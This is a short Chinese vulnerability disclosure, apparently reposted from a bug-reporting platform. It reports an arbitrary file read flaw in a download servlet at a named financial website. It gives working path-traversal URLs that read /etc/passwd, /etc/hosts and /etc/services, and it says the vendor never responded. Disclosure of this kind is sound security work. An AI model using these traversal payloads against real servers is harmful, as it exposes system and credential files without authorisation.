漏洞标题 | 财客在线某处任意文件读取漏洞 |
---|---|
相关厂商 | 财客在线 |
漏洞作者 | 路人甲 |
提交时间 | 2015-07-29 22:07 |
公开时间 | 2015-09-12 22:08 |
漏洞类型 | 命令执行 |
危害等级 | 高 |
自评Rank | 20 |
漏洞状态 | 未联系到厂商或者厂商积极忽略 |
Tags标签 | 补丁不及时,远程命令执行 |
通过下载用户的一个XLS表格
获得下载地址:
http://zx.caakee.com/servlet/download?fileName=caakee_importAccount.xls
在filename参数写入../../../../../../../../../../etc/passwd
即可弹出下载
打开后
zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts
zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts
zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/services
【本文版权归安全脉搏所有,未经许可不得转载。文章仅代表作者看法,如有不同观点,欢迎添加安全脉搏微信号:SecPulse,进行交流。】
Tags: 补丁不及时 远程命令执行